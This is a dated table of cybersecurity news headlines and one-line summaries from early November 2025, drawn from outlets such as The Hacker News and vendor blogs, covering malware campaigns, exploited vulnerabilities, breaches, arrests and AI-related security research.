| 6.11.25 | ThreatsDay Bulletin: AI Tools in Malware, Botnets, GDI Flaws, Election Attacks & More | Cybercrime has stopped being a problem of just the internet — it's becoming a problem of the real world. Online scams now fund organized crime, hackers rent violence like a service, and | Cyber | The Hacker News |
| 6.11.25 | Hackers Weaponize Windows Hyper-V to Hide Linux VM and Evade EDR Detection | The threat actor known as Curly COMrades has been observed exploiting virtualization technologies as a way to bypass security solutions and execute custom malware. According | Hack | The Hacker News |
| 6.11.25 | SonicWall Confirms State-Sponsored Hackers Behind September Cloud Backup Breach | SonicWall has formally implicated state-sponsored threat actors as behind the September security breach that led to the unauthorized exposure of firewall configuration backup files. | Incindent | The Hacker News |
| 6.11.25 | Google Uncovers PROMPTFLUX Malware That Uses Gemini AI to Rewrite Its Code Hourly | Google on Wednesday said it discovered an unknown threat actor using an experimental Visual Basic Script (VB Script) malware dubbed PROMPTFLUX that interacts with its Gemini | Virus | The Hacker News |
| 6.11.25 | Researchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data | Cybersecurity researchers have disclosed a new set of vulnerabilities impacting OpenAI's ChatGPT artificial intelligence (AI) chatbot that could be exploited by an attacker to steal | AI | The Hacker News |
| 5.11.25 | Securing the Open Android Ecosystem with Samsung Knox | Raise your hand if you've heard the myth, "Android isn't secure." Android phones, such as the Samsung Galaxy, unlock new ways of working. But, as an IT admin, you may worry about the | OS | The Hacker News |
| 5.11.25 | Mysterious 'SmudgedSerpent' Hackers Target U.S. Policy Experts Amid Iran–Israel Tensions | A never-before-seen threat activity cluster codenamed UNK_SmudgedSerpent has been attributed as behind a set of cyber attacks targeting academics and foreign policy experts | APT | The Hacker News |
| 5.11.25 | U.S. Sanctions 10 North Korean Entities for Laundering $12.7M in Crypto and IT Fraud | The U.S. Treasury Department on Tuesday imposed sanctions against eight individuals and two entities within North Korea's global financial network for laundering money for various | Cryptocurrency | The Hacker News |
| 5.11.25 | CISA Adds Gladinet and CWP Flaws to KEV Catalog Amid Active Exploitation Evidence | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added two security flaws impacting Gladinet and Control Web Panel (CWP) to its Known Exploited | Vulnerebility | The Hacker News |
| 4.11.25 | A Cybercrime Merger Like No Other — Scattered Spider, LAPSUS$, and ShinyHunters Join Forces | The nascent collective that combines three prominent cybercrime groups, Scattered Spider, LAPSUS$, and ShinyHunters, has created no less than 16 Telegram channels since August 8, | CyberCrime | The Hacker News |
| 4.11.25 | Europol and Eurojust Dismantle €600 Million Crypto Fraud Network in Global Sweep | Nine people have been arrested in connection with a coordinated law enforcement operation that targeted a cryptocurrency money laundering network that defrauded victims of €600 | Cryptocurrency | The Hacker News |
| 4.11.25 | Critical React Native CLI Flaw Exposed Millions of Developers to Remote Attacks | Details have emerged about a now-patched critical security flaw in the popular " @react-native-community/cli " npm package that could be potentially exploited to run malicious | Exploit | The Hacker News |
| 4.11.25 | Microsoft Teams Bugs Let Attackers Impersonate Colleagues and Edit Messages Unnoticed | Cybersecurity researchers have disclosed details of four security flaws in Microsoft Teams that could have exposed users to serious impersonation and social engineering attacks. The | CyberCrime | The Hacker News |
| 4.11.25 | Operation SkyCloak Deploys Tor-Enabled OpenSSH Backdoor Targeting Defense Sectors | Google's artificial intelligence (AI)-powered cybersecurity agent called Big Sleep has been credited by Apple for discovering as many as five different security flaws in the WebKit | CyberCrime | The Hacker News |
| 4.11.25 | Google's AI 'Big Sleep' Finds 5 New Vulnerabilities in Apple's Safari WebKit | Google's artificial intelligence (AI)-powered cybersecurity agent called Big Sleep has been credited by Apple for discovering as many as five different security flaws in the WebKit | Vulnerebility | The Hacker News |
| 4.11.25 | U.S. Prosecutors Indict Cybersecurity Insiders Accused of BlackCat Ransomware Attacks | Federal prosecutors in the U.S. have accused a trio of allegedly hacking the networks of five U.S. companies with BlackCat (aka ALPHV) ransomware between May and November 2023 | Ransom | The Hacker News |
| 4.11.25 | Microsoft Detects "SesameOp" Backdoor Using OpenAI's API as a Stealth Command Channel | Microsoft has disclosed details of a novel backdoor dubbed SesameOp that uses OpenAI Assistants Application Programming Interface (API) for command-and-control (C2) | Virus | The Hacker News |
| 4.11.25 | Malicious VSX Extension "SleepyDuck" Uses Ethereum to Keep Its Command Server Alive | Cybersecurity researchers have flagged a new malicious extension in the Open VSX registry that harbors a remote access trojan called SleepyDuck . According to Secure Annex's John | Cryptocurrency | The Hacker News |
| 3.11.25 | Cybercriminals Exploit Remote Monitoring Tools to Infiltrate Logistics and Freight Networks | Bad actors are increasingly training their sights on trucking and logistics companies with an aim to infect them with remote monitoring and management (RMM) software for financial | Exploit | The Hacker News |
| 3.11.25 | The Evolution of SOC Operations: How Continuous Exposure Management Transforms Security Operations | Security Operations Centers (SOC) today are overwhelmed. Analysts handle thousands of alerts every day, spending much time chasing false positives and adjusting detection rules | Security | The Hacker News |
| 3.11.25 | Researchers Uncover BankBot-YNRK and DeliveryRAT Android Trojans Stealing Financial Data | Cybersecurity researchers have shed light on two different Android trojans called BankBot-YNRK and DeliveryRAT that are capable of harvesting sensitive data from compromised | Virus | The Hacker News |
| 3.11.25 | New HttpTroy Backdoor Poses as VPN Invoice in Targeted Cyberattack on South Korea | The North Korea-linked threat actor known as Kimsuky has distributed a previously undocumented backdoor codenamed HttpTroy as part of a likely spear-phishing attack | Virus | The Hacker News |
| 3.11.25 | Penn hacker claims to have stolen 1.2 million donor records in data breach | A hacker has taken responsibility for last week's University of Pennsylvania "We got hacked" email incident, saying it was a far more extensive breach that exposed data on 1.2 million donors and internal documents. | Incindent | |
| 3.11.25 | Open VSX rotates access tokens used in supply-chain malware attack | The Open VSX registry rotated access tokens after they were accidentally leaked by developers in public repositories and allowed threat actors to publish malicious extensions in an attempted supply-chain attack. | Virus | |
| 3.11.25 | Windows 11 Build 26220.7051 released with “Ask Copilot” feature | Windows 11 Build 26220.7051 is now rolling out to testers in the Windows Insider Program, and there are at least three new features, including Ask Copilot in the taskbar. | OS | |
| 3.11.25 | China-linked hackers exploited Lanscope flaw as a zero-day in attacks | China-linked cyber-espionage actors tracked as 'Bronze Butler' (Tick) exploited a Motex Lanscope Endpoint Manager vulnerability as a zero-day to deploy an updated version of their Gokcpdoor malware. | Exploit | |
| 3.11.25 | Windows 11 tests shared Bluetooth audio support, but only for AI PCs | If you have two headphones, speakers, earbuds, or any other Bluetooth hardware, you can now use both simultaneously on a Copilot+ PC. | OS | |
| 3.11.25 | ‘We got hacked’ emails threaten to leak University of Pennsylvania data | The University of Pennsylvania suffered a cybersecurity incident on Friday, where students and alumni received a series of offensive emails from various University email addresses, claiming that data was stolen in a breach. | Incindent | |
| 3.11.25 | ASD Warns of Ongoing BADCANDY Attacks Exploiting Cisco IOS XE Vulnerability | The Australian Signals Directorate (ASD) has issued a bulletin about ongoing cyber attacks targeting unpatched Cisco IOS XE devices in the country with a previously undocumented | Exploit | The Hacker News |
| 3.11.25 | Microsoft Edge gets scareware sensor for faster scam detection | Microsoft is introducing a new scareware sensor for the Microsoft Edge web browser, which helps detect scam pages more quickly and ensures that Defender SmartScreen blocks them faster. | Spam | |
| 3.11.25 | Australia warns of BadCandy infections on unpatched Cisco devices | The Australian government is warning about ongoing cyberattacks against unpatched Cisco IOS XE devices in the country to infect routers with the BadCandy webshell. | Virus | |
| 3.11.25 | Why password controls still matter in cybersecurity | Passwords still matter — and weak policies leave the door wide open. Specops Software explains how longer passphrases, smarter banned-password lists, and adaptive rotation strategies can strengthen security without frustrating users. | Security | |
| 3.11.25 | Alleged Meduza Stealer malware admins arrested after hacking Russian org | The Russian authorities have arrested three individuals in Moscow who are believed to be the creators and operators of the Meduza Stealer information-stealing malware. | Virus | |
| 3.11.25 | CISA: High-severity Linux flaw now exploited by ransomware gangs | CISA confirmed on Thursday that a high-severity privilege escalation flaw in the Linux kernel is now being exploited in ransomware attacks. | Ransom | |
| 3.11.25 | Google says Search AI Mode will know everything about you | Google wants 'AI mode' on Search to be as personal as possible, and it'll soon tap into services like Gmail or Drive to know more about you. | AI | |
| 3.11.25 | Windows zero-day actively exploited to spy on European diplomats | A China-linked hacking group is exploiting a Windows zero-day in attacks targeting European diplomats in Hungary, Belgium, and other European nations. | Exploit | |
| 3.11.25 | Ukrainian extradited from Ireland on Conti ransomware charges | A Ukrainian national believed to be a member of the Conti ransomware operation has been extradited to the United States and faces charges that could get him 25 years in prison. | Ransom | |
| 3.11.25 | Massive surge of NFC relay malware steals Europeans’ credit cards | Near-Field Communication (NFC) relay malware has grown massively popular in Eastern Europe, with researchers discovering over 760 malicious Android apps using the technique to steal people's payment card information in the past few months. | Virus | |
| 3.11.25 | CISA orders feds to patch VMware Tools flaw exploited by Chinese hackers | CISA has ordered federal agencies to patch a high-severity vulnerability in Broadcom's VMware Aria Operations and VMware Tools software, exploited by Chinese hackers since October 2024. | Exploit | |
| 3.11.25 | Major telecom services provider Ribbon breached by state hackers | Ribbon Communications, a provider of telecommunications services to the U.S. government and telecom companies worldwide, revealed that nation-state hackers breached its IT network as early as December 2024. | Incindent | |
| 2.11.25 | BPO giant Conduent confirms data breach impacts 10.5 million people | American business services giant Conduent has confirmed that a 2024 data breach has impacted over 10.5 million people, according to notifications filed with the US Attorney General's offices. | Incindent | |
| 2.11.25 | WhatsApp adds passwordless chat backups on iOS and Android | WhatsApp is rolling out passkey-encrypted backups for iOS and Android devices, enabling users to encrypt their chat history using their fingerprint, face, or a screen lock code. | Social | |
| 2.11.25 | Ex-L3Harris exec guilty of selling cyber exploits to Russian broker | Peter Williams, a former general manager at U.S. defense contractor L3Harris Trenchant, has pleaded guilty in U.S. District Court to stealing and selling confidential cybersecurity information to a Russian vulnerability exploit broker. | BigBrothers | |
| 2.11.25 | CISA and NSA share tips on securing Microsoft Exchange servers | The Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA) have released guidance to help IT administrators harden Microsoft Exchange servers on their networks against attacks. | BigBrothers | |
| 2.11.25 | LinkedIn phishing targets finance execs with fake board invites | Hackers are abusing LinkedIn to target finance executives with direct-message phishing attacks that impersonate executive board invitations, aiming to steal their Microsoft credentials. | Phishing | |
| 2.11.25 | Microsoft promises more Copilot features in Microsoft 365 companion apps | Microsoft 365 companion apps will be getting more Copilot features in the coming weeks. | Security | |
| 2.11.25 | Malicious NPM packages fetch infostealer for Windows, Linux, macOS | Ten malicious packages mimicking legitimate software projects in the npm registry download an information-stealing component that collects sensitive data from Windows, Linux, and macOS systems. | Virus | |
| 2.11.25 | WordPress security plugin exposes private data to site subscribers | The Anti-Malware Security and Brute-Force Firewall plugin for WordPress, installed on over 100,000 sites, has a vulnerability that allows subscribers to read any file on the server, potentially exposing private information. | Vulnerebility | |
| 2.11.25 | Canada says hacktivists breached water and energy facilities | The Canadian Centre for Cyber Security warned today that hacktivists have breached critical infrastructure systems multiple times across the country, allowing them to modify industrial controls that could have led to dangerous conditions. | Incindent | |
| 2.11.25 | Microsoft fixes Media Creation Tool broken on some Windows PCs | Microsoft has confirmed that the Windows 11 Media Creation Tool (MCT) is working again on Windows 10 22H2 and Windows 11 25H2 systems. | OS | |
| 2.11.25 | Microsoft: DNS outage impacts Azure and Microsoft 365 services | Microsoft is suffering an ongoing DNS outage affecting customers worldwide, preventing them from logging into company networks and accessing Microsoft Azure and Microsoft 365 services. | Security | |
| 2.11.25 | PhantomRaven attack floods npm with credential-stealing packages | An active campaign named 'PhantomRaven' is targeting developers with dozens of malicious npm packages that steal authentication tokens, CI/CD secrets, and GitHub credentials. | Hack | |
| 2.11.25 | Microsoft fixes 0x800F081F errors causing Windows update failures | Microsoft has resolved a known issue that caused Windows updates to fail, leading to 0x800F081F errors on Windows 11 24H2 systems. | OS | |
| 1.11.25 | Windows 11 KB5067036 update rolls out Administrator Protection feature | Microsoft has released the KB5067036 preview cumulative update for Windows 11 24H2 and 25H2, which begins the rollout of the Administrator Protection cybersecurity feature and an updated Start Menu. | OS | |
| 1.11.25 | Advertising giant Dentsu reports data breach at subsidiary Merkle | Japanese advertising giant Dentsu has disclosed that its U.S.-based subsidiary Merkle suffered a cybersecurity incident that exposed staff and client data. | Incindent | |
| 1.11.25 | Qilin ransomware abuses WSL to run Linux encryptors in Windows | The Qilin ransomware operation was spotted executing Linux encryptors in Windows using Windows Subsystem for Linux (WSL) to evade detection by traditional security tools. | Ransom | |
| 1.11.25 | CISA warns of two more actively exploited Dassault vulnerabilities | The Cybersecurity & Infrastructure Security Agency (CISA) warned today that attackers are actively exploiting two vulnerabilities in Dassault Systèmes' DELMIA Apriso, a manufacturing operations management (MOM) and execution (MES) solution. | Exploit | |
| 1.11.25 | Microsoft sued for allegedly tricking millions into Copilot M365 subscriptions | The Australian Competition and Consumer Commission (ACCC) is suing Microsoft for allegedly misleading 2.7 million Australians into paying for the Copilot AI assistant in the Microsoft 365 service. | Security | |
| 1.11.25 | Google Chrome to warn users before opening insecure HTTP sites | Google announced today that the Chrome web browser will load all public websites via secure HTTPS connections by default and ask for permission before connecting to public, insecure HTTP websites, beginning with Chrome 154 in October 2026. | Security | |
| 1.11.25 | TEE.Fail attack breaks confidential computing on Intel, AMD, NVIDIA CPUs | Academic researchers developed a side-channel attack called TEE.Fail, which allows extracting secrets from the trusted execution environment in the CPU, the highly secure area of a system, such as Intel's SGX and TDX, and AMD's SEV-SNP. | Attack | |
| 1.11.25 | BiDi Swap: The bidirectional text trick that makes fake URLs look real | Attackers are abusing bidirectional text to make fake URLs look real, reviving a decade-old browser flaw now fueling new phishing tricks. Varonis reveals how the "BiDi Swap" technique works and what organizations need to watch out for. | Hack | |
| 1.11.25 | New Atroposia malware comes with a local vulnerability scanner | A new malware-as-a-service (MaaS) platform named Atroposia provides cybercriminals a remote access trojan that combines capabilities for persistent access, evasion, data theft, and local vulnerability scanning. | Virus | |
| 1.11.25 | New Herodotus Android malware fakes human typing to avoid detection | A new Android malware family, Herodotus, uses random delay injection in its input routines to mimic human behavior on mobile devices and evade timing-based detection by security software. | Virus | |
| 1.11.25 | Google disputes false claims of massive Gmail data breach | Google was once again forced to announce that it had not suffered a data breach after numerous news outlets published sensational stories about a fake breach that purportedly exposed 183 million accounts. | Incindent | |
| 1.11.25 | X: Re-enroll 2FA security keys by November 10 or get locked out | X is warning that users must re-enroll their security keys or passkeys for two-factor authentication (2FA) before November 10 or they will be locked out of their accounts until they do so. | Social | |
| 1.11.25 | Ransomware profits drop as victims stop paying hackers | The number of victims paying ransomware threat actors has reached a new low, with just 23% of the breached companies giving in to attackers' demands. | Ransom | |
| 1.11.25 | Windows will soon prompt for memory scans after BSOD crashes | Microsoft has started testing a new feature that prompts Windows 11 users to run a memory scan when logging in after a blue screen of death (BSOD). | OS | |
| 1.11.25 | QNAP warns of critical ASP.NET flaw in its Windows backup software | QNAP warned customers to patch a critical ASP.NET Core vulnerability that also impacts the company's NetBak PC Agent, a Windows utility for backing& up data to a QNAP network-attached storage (NAS) device. | Vulnerebility | |
| 1.11.25 | Italian spyware vendor linked to Chrome zero-day attacks | A zero-day vulnerability in Google Chrome exploited in Operation ForumTroll earlier this year delivered malware linked to Italian spyware vendor Memento Labs, born after IntheCyber Group acquired the infamous Hacking Team. | BigBrothers | |
| 1.11.25 | Google says everyone will be able to vibe code video games | Google AI Studio product lead teased that everyone will be able to vibe code video games by the end of the year. | Security | |
| 1.11.25 | Microsoft: New policy removes pre-installed Microsoft Store apps | Microsoft now allows IT administrators to remove pre-installed Microsoft Store apps (also known as in-box apps) using a new app management policy. | Security | |
| 1.11.25 | CISA orders feds to patch Windows Server WSUS flaw used in attacks | The Cybersecurity and Infrastructure Security Agency (CISA) ordered U.S. government agencies to patch a critical-severity Windows Server Update Services (WSUS) vulnerability after adding it to its catalog of security flaws exploited in attacks. | Vulnerebility | BleepingComputer |
| 1.11.25 | Tracking an evolving Discord-based RAT family | RL's analysis of an STD Group-operated RAT yielded file indicators to better detect the malware and two YARA rules. | Malware blog | REVERSINGLABS |
| 1.11.25 | Ukrainian organizations still heavily targeted by Russian attacks | Attackers are gaining access using a custom, Sandworm-linked webshell and are making heavy use of Living-off-the-Land tactics to maintain persistent access. | BigBrother blog | SECURITY.COM |
| 1.11.25 | BRONZE BUTLER exploits Japanese asset management software vulnerability | The threat group targeted a LANSCOPE zero-day vulnerability (CVE-2025-61932) | APT blog | SOPHOS |
| 1.11.25 | Cloud Abuse at Scale | FortiGuard Labs analyzes TruffleNet, a large-scale campaign abusing AWS SES with stolen credentials and linked to Business Email Compromise (BEC). | Spam blog | FORTINET |
| 1.11.25 | Stolen Credentials and Valid Account Abuse Remain Integral to Financially Motivated Intrusions | FortiGuard IR analysis of H1 2025 shows financially motivated actors increasingly abusing valid accounts and legitimate remote access tools to bypass detection, emphasizing the need for identity-centric defenses. | Hacking blog | FORTINET |
| 1.11.25 | Silent Push Unearths AdaptixC2's Ties to Russian Criminal Underworld, Tracks Threat Actors Harnessing Open-Source Tool for Malicious Payloads | Silent Push Threat Analysts have uncovered threat actors using AdaptixC2, a free and open-source Command and Control (C2) framework commonly used by penetration testers, to deliver malicious payloads. | Hacking blog | Silent Push |
| 1.11.25 | Silent Push 2026 Predictions | The Silent Push Threat Intelligence team discussed what we see as some of the greatest threats and motivators the global community will encounter in the New Year. Here are our 2026 predictions: | Security blog | Silent Push |
| 1.11.25 | Privileged access stands as the most critical pathway for adversaries seeking to compromise sensitive systems and data. Its protection is not only a best practice, it is a fundamental imperative for organizational resilience. | Security blog | Google Threat Intelligence | |
| 1.11.25 | A new ideologically-motivated threat actor has emerged and growing technical capabilities: Hezi Rash. This Kurdish ... | APT blog | CHECKPOINT | |
| 1.11.25 | Weaponized Military Documents Deliver Advanced SSH-Tor Backdoor to Defense Sector | Military-themed lure targeting using weaponized ZIPs and hidden tunneling infrastructure | Malware blog | Cyble |
| 1.11.25 | Hacktivist Attacks on Critical Infrastructure Surge: Cyble Report | Hacktivist attacks on industrial control systems (ICS) nearly doubled over the course of the third quarter. | Hacking blog | Cyble |
| 1.11.25 | The Week in Vulnerabilities: Oracle, Microsoft & Adobe Fixes Urged by Cyble | Critical vulnerabilities from Oracle, Microsoft and Adobe are just a few of the flaws meriting high-priority attention by security teams. | Vulnerebility blog | Cyble |
| 1.11.25 | When Money Moves, Hackers Follow: Europe’s Financial Sector Under Siege | Europe’s BFSI sector faces growing deepfake and ransomware threats. CISOs focus on intelligence, resilience, and rapid response to stay ahead. | Ransom blog | Cyble |
| 1.11.25 | APT-C-60 Escalates SpyGlace Campaigns Targeting Japan with Evolved Malware, Advanced Evasion TTPs | APT-C-60 intensified operations against Japanese organizations during Q3 2025, deploying three updated SpyGlace backdoor versions with refined tracking mechanisms, modified encryption, and sophisticated abuse of GitHub, StatCounter, and Git for stealthy malware distribution. | APT blog | Cyble |
| 1.11.25 | From Human-Led to AI-Driven: Why Agentic AI Is Redefining Cybersecurity Strategy | Agentic AI marks the next leap in cybersecurity—autonomous systems that detect, decide, and act in real time, transforming how organizations defend against threats. | AI blog | Cyble |
| 1.11.25 | Operation SkyCloak: Tor Campaign targets Military of Russia & Belarus | Authors: Sathwik Ram Prakki and Kartikkumar Jivani Contents Introduction Key Targets Industries Geographical Focus Infection and Decoys Technical Analysis PowerShell Stage Persistence Configuration Infrastructure and Attribution Conclusion SEQRITE Protection IOCs MITRE ATT&CK Introduction SEQRITE Labs has identified a campaign... | Hacking blog | Seqrite |
| 1.11.25 | Investigation Report: Android/BankBot-YNRK Mobile Banking Trojan | Investigation Report: Android/BankBot-YNRK Mobile Banking Trojan Executive Summary This report covers the analysis and findings related to three Android application packages (APKs) | Malware blog | Cyfirma |
| 1.11.25 | AI Security: NVIDIA BlueField Now with Vision One™ | Launching at NVIDIA GTC 2025 - Transforming AI Security with Trend Vision One™ on NVIDIA BlueField | AI blog | Trend Micro |
| 1.11.25 | Active Water Saci Campaign Spreading Via WhatsApp Features Multi-Vector Persistence and Sophisticated C&C | Continuous investigation on the Water Saci campaign reveals innovative email-based C&C system, multi-vector persistence, and real-time command capabilities that allow attackers to orchestrate coordinated botnet operations, gather detailed campaign intelligence, and dynamically control malware activity across multiple infected machines. | Hacking blog | Trend Micro |
| 1.11.25 | Oracle E-Business Suite Under Siege: Active Exploitation of Dual Zero-Days | The SonicWall Capture Labs threat research team became aware of multiple remote code execution vulnerabilities in Oracle E-Business Suite, assessed their impact and developed mitigation measures. | Exploit blog | SonicWall |
| 1.11.25 | HijackLoader Delivered via SVG files | The SonicWall Capture Labs threat research team has recently been monitoring new variants of the HijackLoader malware that are being delivered through SVG files. | Malware blog | SonicWall |
| 1.11.25 | Bots, Bread and the Battle for the Web | Meet Sarah, an artisanal baker who opens Sarah’s Sourdough. To improve her search engine optimization (SEO), she builds a beautiful website and shares authentic baking content. | BotNet blog | Palo Alto |
| 1.11.25 | Suspected Nation-State Threat Actor Uses New Airstalk Malware in a Supply Chain Attack | We have discovered a new Windows-based malware family we've named Airstalk, which is available in both PowerShell and .NET variants. We assess with medium confidence that a possible nation-state threat actor used this malware in a likely supply chain attack. We have created the threat activity cluster CL-STA-1009 to identify and track any further related activity. | Hacking blog | Palo Alto |
| 1.11.25 | When AI Agents Go Rogue: Agent Session Smuggling Attack in A2A Systems | We discovered a new attack technique, which we call agent session smuggling. This technique allows a malicious AI agent to exploit an established cross-agent communication session to send covert instructions to a victim agent. | AI blog | Palo Alto |
| 1.11.25 | Cybersecurity on a budget: Strategies for an economic downturn | This blog offers practical strategies, creative defenses, and talent management advice to help your business stay secure when every dollar counts. | Cyber blog | CISCO TALOS |
| 1.11.25 | Trick, treat, repeat | Thor gets into the Halloween spirit, sharing new CVE trends, a “treat” for European Windows 10 users, and a reminder that patching is your best defense against zombie vulnerabilities. | Vulnerebility blog | CISCO TALOS |
| 1.11.25 | Dynamic binary instrumentation (DBI) with DynamoRio | Learn how to build your own dynamic binary instrumentation (DBI) tool with open-source DynamoRIO to enable malware analysis, security auditing, reverse engineering, and more. | Cyber blog | CISCO TALOS |
| 1.11.25 | Uncovering Qilin attack methods exposed through multiple cases | Cisco Talos investigated the Qilin ransomware group, uncovering its frequent attacks on the manufacturing sector, use of legitimate tools for credential theft and data exfiltration, and sophisticated methods for lateral movement, evasion, and persistence. | Ransom blog | CISCO TALOS |
| 1.11.25 | Think passwordless is too complicated? Let's clear that up | We’ve relied on passwords for years to protect our online accounts, but they’ve also become one of the easiest ways attackers get in. Cisco Duo helps clear up some of the biggest passwordless myths. | Cyber blog | CISCO TALOS |
| 1.11.25 | Strings in the maze: Finding hidden strengths and gaps in your team | In this week’s newsletter, Bill explores how open communication about your skills and experience can help your security team uncover hidden gaps, strengthen your defenses, and better prepare for ever-present threats. | Cyber blog | CISCO TALOS |
| 1.11.25 | This month in security with Tony Anscombe – October 2025 edition | From the end of Windows 10 support to scams on TikTok and state-aligned hackers wielding AI, October's headlines offer a glimpse of what's shaping cybersecurity right now | Social blog | Eset |
| 1.11.25 | Fraud prevention: How to help older family members avoid scams | Families that combine open communication with effective behavioral and technical safeguards can cut the risk dramatically | Spam blog | Eset |
| 1.11.25 | Cybersecurity Awareness Month 2025: When seeing isn't believing | Deepfakes are blurring the line between real and fake and fraudsters are cashing in, using synthetic media for all manner of scams | Security blog | Eset |
| 1.11.25 | Recruitment red flags: Can you spot a spy posing as a job seeker? | Security blog | Eset | |
| 1.11.25 | How MDR can give MSPs the edge in a competitive market | With cybersecurity talent in short supply and threats evolving fast, managed detection and response is emerging as a strategic necessity for MSPs | Security blog | Eset |
| 1.11.25 | From Scripts to Systems: A Comprehensive Look at Tangerine Turkey Operations | In this Threat Analysis Report, investigates the flow of a Tangerine Turkey campaign | Hacking blog | Cybereason |
| 1.11.25 | The Bug Report - October 2025 Edition | October's cybersecurity horror show is here! Zero-days in WSUS (CVE-2025-59287) and SessionReaper (Adobe) are under active attack. Patch these RCE and LPE monsters now or risk full possession of your network. | Vulnerebility blog | Trelix |
| 1.11.25 | OpenAI Unveils Aardvark: GPT-5 Agent That Finds and Fixes Code Flaws Automatically | OpenAI has announced the launch of an "agentic security researcher" that's powered by its GPT-5 large language model (LLM) and is programmed to emulate a human expert capable | AI | |
| 1.11.25 | Nation-State Hackers Deploy New Airstalk Malware in Suspected Supply Chain Attack | A suspected nation-state threat actor has been linked to the distribution of a new malware called Airstalk as part of a likely supply chain attack. Palo Alto Networks Unit 42 said it's | Virus | The Hacker News |
| 1.11.25 | China-Linked Hackers Exploit Windows Shortcut Flaw to Target European Diplomats | A China-affiliated threat actor known as UNC6384 has been linked to a fresh set of attacks exploiting an unpatched Windows shortcut vulnerability to target European diplomatic and | Exploit | The Hacker News |
| 1.11.25 | China-Linked Tick Group Exploits Lanscope Zero-Day to Hijack Corporate Systems | The exploitation of a recently disclosed critical security flaw in Motex Lanscope Endpoint Manager has been attributed to a cyber espionage group known as Tick . The vulnerability, | Exploit | The Hacker News |
| 1.11.25 | CISA and NSA Issue Urgent Guidance to Secure WSUS and Microsoft Exchange Servers | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and National Security Agency (NSA), along with international partners from Australia and Canada, have released | Exploit | |
| 1.11.25 | Eclipse Foundation Revokes Leaked Open VSX Tokens Following Wiz Discovery | Eclipse Foundation, which maintains the open-source Open VSX project, said it has taken steps to revoke a small number of tokens that were leaked within Visual Studio Code (VS | Vulnerebility | |
| 1.11.25 | CISA Flags VMware Zero-Day Exploited by China-Linked Hackers in Active Attacks | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a high-severity security flaw impacting Broadcom VMware Tools and VMware Aria Operations to its | Exploit | The Hacker News |
| 1.11.25 | A New Security Layer for macOS Takes Aim at Admin Errors Before Hackers Do | A design firm is editing a new campaign video on a MacBook Pro. The creative director opens a collaboration app that quietly requests microphone and camera permissions. | Security | The Hacker News |
| 1.11.25 | Google's Built-In AI Defenses on Android Now Block 10 Billion Scam Messages a Month | Google on Thursday revealed that the scam defenses built into Android safeguard users around the world from more than 10 billion suspected malicious calls and messages every | AI | |
| 1.11.25 | Russian Ransomware Gangs Weaponize Open-Source AdaptixC2 for Advanced Attacks | The open-source command-and-control (C2) framework known as AdaptixC2 is being used by a growing number of threat actors, some of whom are related to Russian ransomware | Ransom | The Hacker News |
| 1.11.25 | New "Brash" Exploit Crashes Chromium Browsers Instantly with a Single Malicious URL | A severe vulnerability disclosed in Chromium's Blink rendering engine can be exploited to crash many Chromium-based browsers within a few seconds. Security researcher Jose Pino, | Exploit | The Hacker News |